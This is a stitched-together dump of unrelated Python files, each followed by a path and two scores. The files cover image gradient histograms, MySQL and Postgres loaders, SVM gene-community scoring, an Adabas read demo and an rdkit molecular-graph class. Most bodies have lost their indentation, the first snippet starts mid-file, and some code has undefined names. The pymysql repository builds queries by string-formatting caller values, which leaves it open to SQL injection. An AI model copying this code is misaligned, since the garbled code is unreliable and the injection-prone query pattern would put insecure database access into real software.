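token = k.encrypt(b"hello")                    # b"v3.local.<b64url(n|c|t)>"
assert k.decrypt(b64url_decode(token.split(b".")[2])) == b"hello"

priv = V3Public(ec.generate_private_key(ec.SECP384R1()))
sig = priv.sign(b"hello")                      # 96-byte r||s signature
assert priv.verify(b"hello" + sig) == b"hello"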
import sys
import cv2 as cv
import numpy as np
def getGradient(image, sigma):
"""
Gradient magnitude calculation from lecture
Takes in image and sigma
Calculates gradient magnitudes and directions(angles) based on sigma
Returns magnitude and directions
"""
kernelSize = (int(4*sigma+1), int(4*sigma+1))
imgGauss = cv.GaussianBlur(image, kernelSize, sigma)
kx,ky = cv.getDerivKernels(1,1,3)
kx = np.transpose(kx/2)
ky = ky/2
imgDx = cv.filter2D(imgGauss,-1,kx)
imgDy = cv.filter2D(imgGauss,-1,ky)
imgGradient = np.sqrt(imgDx**2 + imgDy**2)
imgDir = np.arctan2(imgDy, imgDx)
imgDir = 180*imgDir/np.pi
return imgGradient, imgDir
def pixelNeighborhood(point, image, sigma):
"""
Takes in a point, an image, and sigma
Calculates the width from sigma and creates a pixel "neighborhood"
with the point as the center
Returns the neighborhood
"""
width = int(8*sigma)//2
x,y = point
neighborhood = image[x-width:x+width+1, y-width:y+width+1]
return neighborhood
def getWeights(mag, sigma):
"""
Takes in gradient magnitudes and sigma
Generates Gaussian kernel based on sigma
Creates 2D Gaussian kernel from outer product of the 1D kernel
Multiplies the magnitudes by the kernel to get the weights of the pixels
"""
gaussian = cv.getGaussianKernel(int(8*sigma+1), 2*sigma)
window = np.outer(gaussian,gaussian)
weights = mag * window
return weights
def assignBins(angles, weights):
"""
Takes in sorted angles(directions) and sorted weights
Goes through each bin center (i.e. -175, -165, etc.):
Gets the sum of the weights that fall in that bin
Adds the sum to a list that represented a histogram
i.e. bins has 36 slots with each slot a sum corresponding to each bin center
Return the histogram
"""
binCenters = np.arange(-175, 185, 10)
hist = []
for center in binCenters:
sum = getSum(angles, weights, center - 10, center + 10, center)
if (center == 175):
sum += getSum(angles, weights, -180, -175, -185)
elif (center == -175):
sum += getSum(angles, weights, 175, 180, 185)
hist.append(sum)
return hist
def getSum(angles, weights, start, end, center):
"""
Take in sorted list of angles, sorted list of weights, a start index,
an end index, and a center index
Gets the distance each angle is to the center
Calculates the percent of the weight that falls into that bin
Gets the indices of angles that fall between start and end
Get the weights at those indices (i.e. weights at those angles)
Multiply weights times the percentages and sum the result
Return the sum
"""
dist = np.abs(angles[(angles>=start) & (angles<=end)] - center)
percent = 1 - dist / 10
rangeInd = np.where((angles>=start) & (angles<=end))
sum = 0
if len(rangeInd[0]) != 0:
rangeStart = np.min(rangeInd)
rangeEnd = np.max(rangeInd) + 1
weightRange = weights[rangeStart:rangeEnd]
sum = (weightRange * percent).sum()
return sum
def smoothHistogram(hist):
"""
Take in histogram(bins with sum in each)
Iterates through and "smooths" the weight based on the weight of its
neighbor bins
Returns the smoothed histogram
"""
smoothedHist = []
for i in range(len(hist)):
if i == 0:
neighborWeights = hist[1] + hist[-1]
elif i == len(hist) - 1:
neighborWeights = hist[-2] + hist[0]
else:
neighborWeights = hist[i-1] + hist[i+1]
smoothWeight = (hist[i] + (neighborWeights/2))/2
smoothedHist.append(smoothWeight)
return smoothedHist
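# Tiny worked example of the smoothing rule above (each bin becomes
# (bin + mean(neighbours)) / 2, with circular wrap-around at the ends):
#     smoothHistogram([4.0, 0.0, 0.0, 4.0]) -> [3.0, 1.0, 1.0, 3.0]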
def findPeaks(hist):
"""
Take in histogram
Go through each bin in the histogram and:
Find local maximum and:
Fit a parabola around the two neighbor bins and local max bin
Calculate the critical point that produces the max of the parabola
(critical point represents orientation, max is the peak)
Add both to list of peaks
Return sorted list of peaks
"""
    peaks = []
    binRanges = np.arange(-175, 185, 10)
    histMax = np.max(hist)
    for i in range(len(hist)):
        if i == 0:
            left, right = -1, 1
        elif i == len(hist) - 1:
            left, right = -2, 0
        else:
            left, right = i-1, i+1
        if (hist[i] - hist[left]) >= (0.01*histMax) \
            and (hist[i] - hist[right]) >= (0.01*histMax):
            a = (hist[right] - 2*hist[i] + hist[left]) / 2
            b = (hist[right] - hist[left]) / 2
            c = hist[i]
            # critical point (vertex of the parabola): x = -b / (2a)
            x = -b / (2*a)
            # peak value at the vertex; named separately so the
            # histogram-wide threshold histMax is not clobbered
            peakValue = a*(x**2) + b*x + c
            offset = (x*10) + binRanges[i]
            peaks.append((peakValue, offset))
    return sorted(peaks, reverse=True)
def output(point, num, histogram, smoothHistogram, peaks):
"""
Take in the point being evaluated, the number of that point, the histogram
calculated, the smoothed histogram, and the list of peaks
Output histogram and smoothed histogram info
Output peak info and strong orientation peak info
"""
print("\n Point {}: ({},{})\nHistograms:".format(num, point[0], point[1]))
binRanges = np.arange(-180, 190, 10)
for i in range(36):
br1, br2 = binRanges[i], binRanges[i+1]
h, sh = histogram[i], smoothHistogram[i]
print("[{},{}]: {:.2f} {:.2f}".format(br1, br2, h, sh))
maxPeak = 0
for i in range(len(peaks)):
peak, offset = peaks[i]
print("Peak {}: theta {:.1f}, value {:.2f}".format(i, offset, peak))
if peak > maxPeak:
maxPeak = peak
print("Number of strong orientation peaks: {}".format(strongPeaks(maxPeak, peaks)))
def strongPeaks(max, peaks):
"""
Take in max peak and other peaks
Count how many have a strong orientation (i.e. are 80% or above of the max)
Return the count
"""
strongPeaks = 0
for i in range(len(peaks)):
peak = peaks[i][0]
if peak >= 0.8*max:
strongPeaks += 1
return strongPeaks
if __name__ == "__main__":
"""
Handle command line arguments
"""
if len(sys.argv) != 4:
print("Correct usage: p2_compare.py sigma img points")
sys.exit()
else:
sig = sys.argv[1]
inImgName = sys.argv[2]
pointsFileName = sys.argv[3]
try:
sig = float(sig)
except ValueError:
print("Sigma must be real number!")
sys.exit()
try:
inImg = cv.imread(inImgName,0).astype(np.float64)
except AttributeError:
print("{} is not a valid image!".format(inImgName))
sys.exit()
try:
points = np.loadtxt(pointsFileName, dtype=np.uint16)
except ValueError:
print("Malformed points file: {}, must be numbers".format(pointsFile))
sys.exit()
"""
Iterate through all the points in the file:
Get gradient magnitudes and directions of whole image
Crop those magnitudes and directions down to neighborhood around point
Sort the directions and the weights (making sure each element still
corresponds to other element in the other list)
Assign bins (make histogram)
Smooth the histogram
Get the peaks
Output all the info
"""
    fullMag, fullDir = getGradient(inImg, sig)
    for i in range(len(points)):
        point = points[i]
        gradientMag = pixelNeighborhood(point, fullMag, sig)
        gradientDir = pixelNeighborhood(point, fullDir, sig)
dirSort = np.sort(gradientDir, axis=None)
dirInd = np.argsort(gradientDir, axis=None)
weights = getWeights(gradientMag, sig).flatten()
weights = weights[dirInd]
bins = assignBins(dirSort, weights)
smoothedBins = smoothHistogram(bins)
peaks = findPeaks(smoothedBins)
        output(points[i], i, bins, smoothedBins, peaks) | orientation/orientation.py | 0.653238 | 0.735475
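# Standalone sketch of the parabola refinement findPeaks uses above: fit
# y = a*x**2 + b*x + c through the histogram values at x = -1, 0, +1
# (left, centre, right bins); the vertex x* = -b / (2a) gives the sub-bin
# offset, scaled by the 10-degree bin width. Bin weights are made up.
left, centre, right = 2.0, 5.0, 4.0
a = (right - 2 * centre + left) / 2
b = (right - left) / 2
x_star = -b / (2 * a)                           # vertex of the parabola
peak_value = a * x_star ** 2 + b * x_star + centre
print(x_star * 10, peak_value)                  # 2.5 degrees offset, 5.125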
import sys
from fun import public
import pymysql
from settings import config
class DBConnection:
def __init__(self):
self.__conn_dict = config.wk_mysql_default_conn
self.conn = None
self.cursor = None
def connect(self, cursor=pymysql.cursors.DictCursor):
        # create the database connection
        self.conn = pymysql.connect(**self.__conn_dict)
        # create a cursor
self.cursor = self.conn.cursor(cursor=cursor)
return self.cursor
def close(self):
self.conn.commit()
self.cursor.close()
self.conn.close()
class ApplyRepository:
def __init__(self):
self.conn = DBConnection()
def handel_query(self,limit = '', *args, **kwargs):
cursor = self.conn.connect()
try:
limit = int(limit)
except Exception:
limit = 1
        if len(args) == 0:
            columns = '*'
        else:
            columns = ', '.join(args)
is_null = ''
condition = ''
for k, v in kwargs.items():
is_null += v
if is_null == '':
sql = " select %s from apply order by update_time desc limit 100; " % (columns)
else:
for k, v in kwargs.items():
condition += " %s = '%s' and " % (k, v)
sql = " select %s from apply where %s " % (columns, condition)
sql = sql.strip()[:-4]
sql = sql + ' order by create_time desc limit 1;'
        public.log_record('Query application info:', sys._getframe().f_lineno, sql)
        cursor.execute(sql)
        if limit > 1:
            results = cursor.fetchall()
        else:
            results = cursor.fetchone()
        self.conn.close()
        return results
def handel_delete(self,apply_id):
cursor = self.conn.connect()
sql = " delete from apply where apply_id = '%s' ; "%apply_id
cursor.execute(sql)
self.conn.close()
def handel_update(self,**kwargs):
cursor = self.conn.connect()
sql = " update apply set %s = '%s' where apply_id = '%s' ;"
for k,v in kwargs.items():
new_sql = sql%(k,v,kwargs['apply_id'])
            public.log_record('Update application status:', sys._getframe().f_lineno, new_sql)
cursor.execute(new_sql)
self.conn.close()
class AttachmentRepository:
def __init__(self):
self.conn = DBConnection()
def handel_query(self, *args, **kwargs):
cursor = self.conn.connect()
        if len(args) == 0:
            columns = '*'
        else:
            columns = ', '.join(args)
is_null = ''
condition = ''
for k, v in kwargs.items():
is_null += v
if is_null == '':
sql = " select %s from attachment ; " % (columns)
else:
for k, v in kwargs.items():
condition += " %s = '%s' and " % (k, v)
sql = " select %s from attachment where %s " % (columns, condition)
sql = sql.strip()[:-4]+';'
        public.log_record('Query image attachment info:', sys._getframe().f_lineno, sql)
cursor.execute(sql)
results = cursor.fetchall()
self.conn.close()
return results
class ApplyToCuBaseInfoRepository:
def __init__(self):
self.conn = DBConnection()
def handel_query(self, *args, **kwargs):
cursor = self.conn.connect()
        if len(args) == 0:
            columns = '*'
        else:
            columns = ', '.join(args)
is_null = ''
condition = ''
for k, v in kwargs.items():
is_null += v
if is_null == '':
sql = """
select %s from apply t1,cu_base_info t2
where t1.apply_id = t2.apply_id
order by t1.create_time desc
limit 1;
""" %(columns)
else:
for k, v in kwargs.items():
condition += " %s = '%s' and " % (k, v)
sql = """
select %s from apply t1,cu_base_info t2
where t1.apply_id = t2.apply_id
and %s
""" % (columns,condition)
sql = sql.strip()[:-4]
sql = sql + ' order by t1.create_time desc limit 1;'
        public.log_record('Query application and customer info:', sys._getframe().f_lineno, sql)
cursor.execute(sql)
result = cursor.fetchone()
self.conn.close()
return result
if __name__ == '__main__':
    pass | auto/wpt_interface_test/fun/wk_db_server.py | 0.177775 | 0.137504
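# Safer variant of the string-formatted SQL above (a sketch, not this
# repository's API): pymysql binds parameters server-side via %s
# placeholders, avoiding quoting and injection issues. The 'status'
# column name is hypothetical, used only for illustration.
def update_apply_status(cursor, apply_id, status):
    cursor.execute(
        "UPDATE apply SET status = %s WHERE apply_id = %s;",
        (status, apply_id),
    )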
import pandas as pd
import psycopg2
import os
from dotenv import load_dotenv
load_dotenv()
USER = os.getenv('USER')
PASSWORD = os.getenv('PASSWORD')
df_titanic = pd.read_csv('titanic.csv')
# get column names for the PostgreSQL database
columns = ['Survived', 'Pclass', 'Name', 'Sex', 'Age', 'Siblings/Spouses Aboard',
'Parents/Children Aboard', 'Fare']
# clean the names of any ' that may become an issue in passing queries
df_titanic['Name'] = df_titanic['Name'].apply(lambda x: str.replace(x, "'", ""))
# connect to the ElephantSQL Postgres DB
pg_conn = psycopg2.connect(dbname='mlrgffyq',
                           user=USER,
                           password=PASSWORD,
                           host='queenie.db.elephantsql.com')
# open a cursor
pg_curs = pg_conn.cursor()
# check connection by sending a query to the DB and retrieve result
query = 'SELECT * FROM character_sqlite'
pg_curs.execute(query)
results = pg_curs.fetchall()
# print(results)
# connection works; now create the titanic table and load df_titanic row by row (a simple ETL: Extract, Transform, Load)
# make a new table, delete if similar name table exists
query = """
drop table IF exists titanic;
-- All in " " to make sure column names are capitalized
create table titanic
(
"Survived" int,
"Pclass" int,
"Name" varchar(90),
"Sex" varchar(7),
"Age" float4,
"Siblings/Spouses Aboard" int,
"Parents/Children Aboard" int,
"Fare" float8
);
"""
pg_curs.execute(query)
# Make a list of dataframe rows to insert one at a time
new_list = df_titanic.values.tolist()
print(','.join(map(str, new_list[0])))
# Parameterized insert: psycopg2 fills the %s placeholders and handles quoting,
# instead of splicing quoted string literals into the SQL by hand
query = f"""INSERT INTO titanic ({'"' + '", "'.join(columns) + '"'}) VALUES ({', '.join(['%s'] * len(columns))})"""
# Loop to add dataframe rows one insert at a time
for i in range(len(df_titanic)):
    # uncomment for verbose
    # print(f'OK {i} of {len(df_titanic)}')
    pg_curs.execute(query, new_list[i])
pg_conn.commit()
# Test table
character_query = '''SELECT * FROM titanic'''
pg_curs.execute(character_query)
results = pg_curs.fetchall()
print(results)
print('COMPLETE!')
# Close connection
pg_conn.close()
print('CLOSED!') | module2-sql-for-analysis/assignment/insert_titanic.py | 0.135146 | 0.132908 |
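Row-by-row INSERTs make one server round trip per record. For larger frames, psycopg2 ships a batch helper; a minimal sketch assuming the titanic table and the columns list created above:
# Batch insert with psycopg2's execute_values helper: one round trip per page
from psycopg2.extras import execute_values
col_sql = '"' + '", "'.join(columns) + '"'
execute_values(pg_curs,
               f'INSERT INTO titanic ({col_sql}) VALUES %s',
               df_titanic[columns].values.tolist())
pg_conn.commit()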
import argparse
import pickle
import numpy as np
import pandas as pd
from sklearn import svm
from sklearn.model_selection import cross_validate
from definitions import TISSUES
# python -u 05_01_svms_communities.py --tissue_num NUM | tee outputs/output_05_01_NUM.txt
def calculate_svm(tissue_name):
corr_mat = pd.read_pickle("data/corr_" + tissue_name + ".pkl")
communities = pickle.load(open("results/louvain_modules_" + tissue_name + ".pkl", "rb"))
community_id = 0
# For each community found in each tissue
for community in np.unique(communities[0]):
common = [x for x in all_df.columns.values if x in np.array(corr_mat.columns)[communities[0] == community]]
        # Communities of size 3 or less are considered small and are skipped
if len(common) <= 3:
continue
filtered_df = all_df.loc[:, common]
filtered_w_tissue = filtered_df.join(all_df['tissue'])
dic_community = {}
dic_community['genes'] = common
community_id += 1
X = filtered_w_tissue.loc[:, common].values
for f_name in sorted(TISSUES):
print("-- Predicting " + f_name + " with " + tissue_name + " community " + str(community_id))
y = filtered_w_tissue.loc[:, 'tissue'].copy().values
for j, elem in enumerate(y):
if elem == "_" + f_name:
y[j] = 1
else:
y[j] = 0
dic_community[f_name] = {}
scoring = ['accuracy', 'f1', 'roc_auc']
clf = svm.SVC(kernel='linear', class_weight="balanced")
scores = cross_validate(clf, X, list(y), cv=3, scoring=scoring, n_jobs=-1)
score = scores['test_accuracy']
dic_community[f_name]['acc'] = score.mean()
dic_community[f_name]['acc_std'] = score.std()
print("Accuracy: %.4f (%.4f)" % (score.mean(), score.std()))
score = scores['test_f1']
dic_community[f_name]['f1'] = score.mean()
dic_community[f_name]['f1_std'] = score.std()
print("F1 score: %.4f (%.4f)" % (score.mean(), score.std()))
score = scores['test_roc_auc']
dic_community[f_name]['roc'] = score.mean()
dic_community[f_name]['roc_std'] = score.std()
print("ROC AUC: %.4f (%.4f)" % (score.mean(), score.std()))
pickle.dump(dic_community, open("svm_results/" + tissue_name + '_' + str(community_id) + ".pkl", "wb"))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--tissue_num", type=int,
help='Tissue number in the TISSUES array (from definitions module), on which the code will be executed')
args = parser.parse_args()
print("Going with", TISSUES[args.tissue_num])
# Creating the whole table
all_pandas = []
for f_name in sorted(TISSUES):
pd_tmp = pd.read_csv("data_filtered/only_geneids_CORRECTED_" + f_name + ".csv", index_col=0)
pd_tmp.rename(index=lambda x: x + "_" + f_name, inplace=True)
all_pandas.append(pd_tmp)
all_df = pd.concat(all_pandas, sort=False)
    # Min-max scale manually because of the NaNs
all_df = all_df.sub(all_df.min()).div((all_df.max() - all_df.min()))
all_df.fillna(0, inplace=True)
# Adding tissue information to the dataframe
    def label_race(row):
        # everything after the first '_' in the row index is the tissue label
        splitted = row.name.split('_')
        return ''.join('_' + part for part in splitted[1:])
all_df['tissue'] = all_df.apply(lambda row: label_race(row), axis=1)
    calculate_svm(TISSUES[args.tissue_num]) | 05_01_svms_communities.py | 0.486332 | 0.280486 |
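Each run dumps one pickle per community into svm_results/, keyed by tissue with 'acc', 'f1' and 'roc' entries (plus a 'genes' list). A small sketch of collecting those files into one DataFrame for comparison; the glob pattern mirrors the dump path above, everything else is illustrative:
import glob
import pickle
import pandas as pd

rows = []
for path in glob.glob("svm_results/*.pkl"):
    with open(path, "rb") as fh:
        dic = pickle.load(fh)
    for tissue, scores in dic.items():
        if tissue == 'genes':  # the gene list entry, not a tissue result
            continue
        rows.append({'community_file': path, 'tissue': tissue, **scores})
summary = pd.DataFrame(rows)
print(summary.sort_values('roc', ascending=False).head())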
import mysql.connector
import sys
from messytables import CSVTableSet, type_guess, \
    types_processor, headers_guess, headers_processor, \
    offset_processor, any_tableset
# A table set is a collection of tables:
def csvParse(csv_file_path):
fh = open(csv_file_path, 'rb')
# Load a file object:
table_set = CSVTableSet(fh)
row_set = table_set.tables[0]
# guess header names and the offset of the header:
offset, headers = headers_guess(row_set.sample)
row_set.register_processor(headers_processor(headers))
# add one to begin with content, not the header:
row_set.register_processor(offset_processor(offset + 1))
# guess column types:
types = type_guess(row_set.sample, strict=True)
row_set.register_processor(types_processor(types))
return row_set, headers, offset, types
def transformHeaderString(header_name):
return header_name
def transformHeaderType(header_type):
if str(header_type) == 'String':
return 'TEXT'
elif str(header_type) == 'Integer':
return 'INTEGER'
else:
return 'TEXT'
def generateInsertSQL(table_name, headers, types):
insert_sql = 'INSERT INTO ' + table_name + '('
for col in headers:
insert_sql = insert_sql + transformHeaderString(col) + ', '
insert_sql = insert_sql[:len(insert_sql)-2] + ') VALUES ('
for i in range(len(headers)):
#insert_sql = insert_sql + ' %s::' + transformHeaderType(types[i]) + ', '
insert_sql = insert_sql + ' %s, '
return insert_sql[:len(insert_sql)-2] + ')'
def generateCreateTableSQL(table_name, headers, types):
create_table_sql = 'CREATE TABLE ' + table_name + '('
for i in range(len(headers)):
create_table_sql = create_table_sql + ('' + transformHeaderString(headers[i])) + ' ' + ('' + transformHeaderType(types[i])) + ', '
return create_table_sql[:len(create_table_sql)-2] + ')'
row_set, headers, offset, types = csvParse(sys.argv[1])
create_table_sql = generateCreateTableSQL('SSTABLE', headers, types)
'''
outputDB = mysql.connector.connect(
    host=sys.argv[2],
    user=sys.argv[3],
    password=sys.argv[4],
    database=sys.argv[5]
)
'''
outputDB = mysql.connector.connect(
user=sys.argv[2],
database=sys.argv[3]
)
table_name = 'SSTABLE'
outputCursor = outputDB.cursor(prepared=True)
outputCursor.execute('DROP TABLE IF EXISTS ' + table_name)
outputCursor.execute(create_table_sql)
insert_sql = generateInsertSQL(table_name, headers, types)
row_count = 0
for row in row_set:
    row_count = row_count + 1
    if row_count > 10000:
        break  # the original bare `exit` was a no-op; actually stop at 10000 rows
    param_tuple = tuple(cell.value for cell in row)
    outputCursor.execute(insert_sql, param_tuple)
outputDB.commit()  # without a commit the inserted rows were never persisted
outputCursor.close() | import.py | 0.257298 | 0.152001 |
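mysql-connector's prepared cursors can also batch the inserts; a sketch assuming the row_set, insert_sql and connection objects built above (note messytables row sets may need re-reading if already consumed):
# Batch the inserts with executemany instead of one execute per row
params = [tuple(cell.value for cell in row) for row in row_set]
outputCursor.executemany(insert_sql, params[:10000])  # keep the original 10000-row cap
outputDB.commit()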
import string
import time   # used by the read timer below; not explicitly imported in the original
import adabas
from adabas.api import *
from adabas.datamap import *
from adabas.dump import *
DBID=8;FNR=11 # Employees file mf
#DBID=12;FNR=11 # Employees file pcmm2
STARTISN=0
RCOUNT=1100
MULTIFETCH=8 # number of records per call: MULTI FETCH if > 1
USEACBX=1
# define the mapping of data in record buffer to attributes
# of EmpTel class
emp = Datamap( 'EmployeeTeleLine',
String('persid' , 8),
String('firstname' , 20),
String('initial' , 20),
String('lastname' , 20),
String('birth' , 8),
String('country' , 3),
String('areacode' , 6),
String('phone' , 15),
String('department', 6),
String('jobtitle' , 25))
name=''
dept=''
MULTIFETCH=int(raw_input('Enter MULTIFETCH number:'))
empsize=emp.getsize()
print 'One employees record has %d bytes' % empsize
if MULTIFETCH <=1:
MULTIFETCH=1
rbl1=empsize*MULTIFETCH
if USEACBX:
mbl1=4+16*MULTIFETCH
c1=Adabasx(rbl=rbl1,fbl=64,sbl=32,vbl=128,mbl=mbl1,multifetch=MULTIFETCH)
c1.dumprb=1;c1.dumpcb=1;c1.dumpmb=1;c1.dumpfb=c1.dumpsb=c1.dumpvb=1
c1.acb=c1.acbx
else:
ibl1=4+16*MULTIFETCH
c1=Adabas(rbl=rbl1,fbl=64,sbl=32,vbl=128,ibl=ibl1,multifetch=MULTIFETCH)
c1.dumpcb=1;c1.dumprb=1;c1.dumpib=1
c1.cb.dbid=DBID
c1.cb.fnr=FNR
c1.cb.cid='EMPL'
print '\nSelect Employees file %d on database %d' % (FNR, DBID)
while name == '' and dept=='':
name=raw_input('Enter EMPTEL Selection values for NAME:')
if len(name) > 0:
print ' with name=%s' % name
c1.searchfield('AE,20', 20, name)
break
    dept=raw_input('Enter EMPTEL Selection values for DEPARTMENT (e.g. SALE10):')
    if len(dept) > 0:
        print ' with department=%s' % dept
        c1.searchfield('AO', 6, dept)  # search on the department value (was mistakenly 'name')
        break
c1.sb.write('.')
dump(c1.vb, header='Value Buffer')
c1.cb.cmd='L3'
c1.cb.op2='A' # ascending
c1.cb.ad1=c1.sb[0:2] # search descriptor
if MULTIFETCH>1:
c1.cb.op1='M' # M multifetch
# write to buffer starting with pos. 0
c1.fb.write('AA,AC,AD,AE,AH,8,U,AL,AN,AM,AO,AP.')
count=0 # number of returned records
cstart=time.clock()
try:
c1.dumpbefore=1
mf=c1.multifetch(emp) # generator
while mf.next(): # rl has record length
count+=1
birthdate=emp.birth
#"""
print '%4d %s %-30s %-3s %-6s %-15s %s %s-%s-%s %s'\
%(c1.cb.isn, emp.persid,
# string.capwords(emp.lastname+', '+emp.firstname+' '+emp.initial),
emp.lastname+', '+emp.firstname+' '+emp.initial,
emp.country,emp.areacode,emp.phone,
emp.department,
birthdate[0:4],birthdate[4:6],birthdate[6:8],
string.capwords(emp.jobtitle))
#"""
except DataEnd:
    print 'Sequential read by descriptor returned', count, 'record(s).'
pass
except DatabaseError, (line, apa):
print line
dump(apa.acb, header='Control Block')
dump(apa.sb, header='Search Buffer')
dump(apa.vb, header='Value Buffer')
dump(apa.fb, header='Format Buffer')
dump(apa.rb, header='Record Buffer')
dump(apa.mb, header='Multifetch Buffer')
print 'Read time %f sec' % (time.clock() - cstart,) | Adabas/demo/Emptel/EmptelReadByDescriptorMF.py | 0.199971 | 0.060474 |
import networkx as nx
import numpy as np
from molreps.methods.geo_npy import add_edges_reverse_indices
# Rdkit
try:
import rdkit
import rdkit.Chem.Descriptors
import rdkit.Chem.AllChem
MOLGRAPH_RDKIT_AVAILABLE = True
from molreps.methods.mol_rdkit import rdkit_atom_list, rdkit_bond_list, rdkit_bond_distance_list
from molreps.methods.mol_rdkit import rdkit_mol_from_atoms_bonds, rdkit_add_conformer
except ModuleNotFoundError:
print("Warning: Rdkit not found for mol class.")
MOLGRAPH_RDKIT_AVAILABLE = False
# openbabel
try:
from openbabel import openbabel
MOLGRAPH_OPENBABEL_AVAILABLE = True
from molreps.methods.mol_pybel import ob_get_bond_table_from_coordinates
except ModuleNotFoundError:
print("Warning: Openbabel not found for mol class.")
MOLGRAPH_OPENBABEL_AVAILABLE = False
if MOLGRAPH_RDKIT_AVAILABLE:
def rdkit_get_property_atoms(mol, key, prop, **kwargs):
atom_fun_dict = {
"AtomicNum": rdkit.Chem.rdchem.Atom.GetAtomicNum,
"Symbol": rdkit.Chem.rdchem.Atom.GetSymbol,
"NumExplicitHs": rdkit.Chem.rdchem.Atom.GetNumExplicitHs,
"NumImplicitHs": rdkit.Chem.rdchem.Atom.GetNumImplicitHs,
"IsAromatic": rdkit.Chem.rdchem.Atom.GetIsAromatic,
"TotalDegree": rdkit.Chem.rdchem.Atom.GetTotalDegree,
"TotalValence": rdkit.Chem.rdchem.Atom.GetTotalValence,
"Mass": rdkit.Chem.rdchem.Atom.GetMass,
"IsInRing": rdkit.Chem.rdchem.Atom.IsInRing,
"Hybridization": rdkit.Chem.rdchem.Atom.GetHybridization,
"ChiralTag": rdkit.Chem.rdchem.Atom.GetChiralTag,
"FormalCharge": rdkit.Chem.rdchem.Atom.GetFormalCharge,
"ImplicitValence": rdkit.Chem.rdchem.Atom.GetImplicitValence,
"NumRadicalElectrons": rdkit.Chem.rdchem.Atom.GetNumRadicalElectrons,
}
if prop in atom_fun_dict:
return rdkit_atom_list(mol, key, atom_fun_dict[prop])
else:
raise NotImplementedError("Property", prop, "is not predefined, use custom function.")
def rdkit_get_property_bonds(mol, key, prop, **kwargs):
bond_fun_dict = {
"BondType": rdkit.Chem.rdchem.Bond.GetBondType,
"IsAromatic": rdkit.Chem.rdchem.Bond.GetIsAromatic,
"IsConjugated": rdkit.Chem.rdchem.Bond.GetIsConjugated,
"IsInRing": rdkit.Chem.rdchem.Bond.IsInRing,
"Stereo": rdkit.Chem.rdchem.Bond.GetStereo
}
if prop in bond_fun_dict:
return rdkit_bond_list(mol, key, bond_fun_dict[prop])
elif prop == "Distance":
return rdkit_bond_distance_list(mol, key, **kwargs)
else:
raise NotImplementedError("Property", prop, "is not predefined, use custom function.")
def rdkit_get_property_molstate(mol, key, prop, **kwargs):
state_fun_dict = {
"ExactMolWt": rdkit.Chem.Descriptors.ExactMolWt
}
if prop in state_fun_dict:
return {key: state_fun_dict[prop](mol)}
elif prop == "NumAtoms":
return {key: mol.GetNumAtoms()}
else:
raise NotImplementedError("Property", prop, "is not predefined, use custom function.")
# Main class to make graph
class MolGraph(nx.Graph):
"""Molecular Graph which inherits from networkx graph."""
_mols_implemented = {'rdkit': {
'nodes': ["AtomicNum", "Symbol", "NumExplicitHs","NumImplicitHs","IsAromatic","TotalDegree",
"TotalValence","Mass", "IsInRing","Hybridization", "ChiralTag", "FormalCharge",
"ImplicitValence", "NumRadicalElectrons"],
'edges': ["BondType","IsAromatic","IsConjugated","IsInRing","Stereo","Distance"],
'state': ["NumAtoms", "ExactMolWt"]}
}
def __init__(self, mol=None, **kwargs):
super(MolGraph, self).__init__(**kwargs)
self.mol = mol
# State Variable
self._graph_state = {}
self.mol_type = None
        if MOLGRAPH_RDKIT_AVAILABLE and isinstance(mol, rdkit.Chem.Mol):
            self.mol_type = "rdkit"
        # Check for identifier
def _make_edges(self, key, propy, **args):
if self.mol_type == "rdkit":
self.add_edges_from(rdkit_get_property_bonds(self.mol, key=key, prop=propy, **args))
else:
raise ValueError("Property identifier is not implemented for mol type", self.mol_type)
def _make_nodes(self, key, propy, **args):
if self.mol_type == "rdkit":
self.add_nodes_from(rdkit_get_property_atoms(self.mol, key=key, prop=propy, **args))
else:
raise ValueError("Property identifier is not implemented for mol type", self.mol_type)
def _make_state(self, key, propy, **args):
if self.mol_type == "rdkit":
self._graph_state.update(rdkit_get_property_molstate(self.mol, key=key, prop=propy, **args))
else:
raise ValueError("Property identifier is not implemented for mol type", self.mol_type)
def make(self,
nodes=None,
edges=None,
state=None
):
"""
Construct graph from mol instance.
The input is a dictionary of properties to calculate. The dict-key
can be chosen freely and will be graph attributes.
The identifier is a string for built-in function e.g. 'proton'. Or if args have to be provided:
key : {'class': identifier, 'args':{ args_dict }}
        Otherwise you can provide a custom method via the identifier dict of the form:
key : {'class': function/class, 'args':{ args_dict }}
The callable object of 'class' must accept as first argument this instance.
Then key=key and then additional args from 'args':{ args_dict }.
Args:
nodes (dict, optional): Properties for nodes. Defaults to {'proton' : "proton" }
            edges (dict, optional): Properties for edges. Defaults to
                {'bond': 'bond'} or {'distance': {'class': 'distance', 'args': {}}}
state (dict, optional): Properties for graph state. Defaults to {'size' : 'size'}
Raises:
AttributeError: If mol not found.
ValueError: If identifier dict is incorrect.
TypeError: If property info is incorrect.
Returns:
self: This instance.
"""
# Set defaults if None
if self.mol is None:
raise AttributeError("Initialize Molecule before making graph")
if nodes is None:
nodes = [self._mols_implemented[self.mol_type]['nodes'][0]]
if edges is None:
edges = [self._mols_implemented[self.mol_type]['edges'][0]]
if state is None:
state = [self._mols_implemented[self.mol_type]['state'][0]]
# Make default keys if only list is inserted
if isinstance(nodes, list) or isinstance(nodes, tuple):
nodes_dict = {}
for x in nodes:
if isinstance(x, str):
nodes_dict.update({x: x})
elif isinstance(x, dict):
nodes_dict.update({x['class']: x})
else:
raise ValueError(
"Method must be single string or class dict but got", x)
nodes = nodes_dict
if isinstance(edges, list) or isinstance(edges, tuple):
edges_dict = {}
for x in edges:
if isinstance(x, str):
edges_dict.update({x: x})
elif isinstance(x, dict):
edges_dict.update({x['class']: x})
else:
raise ValueError(
"Method must be single string or class dict serialized, but got", x)
edges = edges_dict
if isinstance(state, list) or isinstance(state, tuple):
state_dict = {}
for x in state:
if isinstance(x, str):
state_dict.update({x: x})
elif isinstance(x, dict):
state_dict.update({x['class']: x})
else:
raise ValueError(
"Method must be single string or class dict but got", x)
state = state_dict
for key, value in nodes.items():
if isinstance(value, str):
self._make_nodes(key, value)
elif isinstance(value, dict):
if 'class' not in value:
raise ValueError(" 'class' method must be defined in", value)
if isinstance(value['class'], str):
args = value['args'] if 'args' in value else {}
self._make_nodes(key, value['class'], **args)
else:
# Custom function/class here
args = value['args'] if 'args' in value else {}
value['class'](self, key=key, **args)
else:
raise TypeError(
"Method must be a dict of {'class' : callable function/class or identifier, \
'args' : {'value' : 0} }, with optional args but got",
value, "instead")
for key, value in edges.items():
if isinstance(value, str):
self._make_edges(key, value)
elif isinstance(value, dict):
if 'class' not in value:
raise ValueError(" 'class' method must be defined in", value)
if isinstance(value['class'], str):
